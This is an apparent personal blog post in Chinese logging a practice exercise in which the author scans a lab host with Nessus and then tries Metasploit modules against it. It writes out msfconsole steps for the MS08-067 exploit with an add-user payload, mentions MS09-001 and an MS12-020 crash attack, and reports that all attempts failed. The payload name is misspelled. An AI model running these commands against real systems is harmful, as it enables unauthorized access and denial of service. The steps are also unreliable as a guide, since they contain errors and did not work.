4_演练3-16(Nessus,Metasploit)

今天主要是用Nessus扫出已知漏洞,然后根据漏洞用metasploit去攻击。不过今天好像不是很成功。


0x01 漏扫

装Nessus装了半天。
扫出如下:
 

0x02 利用第一个漏洞ms08_067

用Kali:
msfconsole -p 静默加载
 
search ms08_067
使用这个模块:
use exploit/windows/smb/ms08_067_netapi
然后看看有什么payloads
show payloads
这里用widnows/adduser
set payload widnows/adduser
show options
set RHOST 192.168.0.203
exploit
 
 
 ???不懂为何不行?

再用其它payload都fail了。。。
不知道为什么


0x03 接下来利用另 一个ms09-001

search ms09-001
 

不懂是啥意思。。我没有set payload,明天再重新搞搞。


0x05 利用ms12-20
 这个好像是把主机down掉的。。。

 



posted @ 2017-03-20 01:24  muhe  阅读(251)  评论(0)    收藏  举报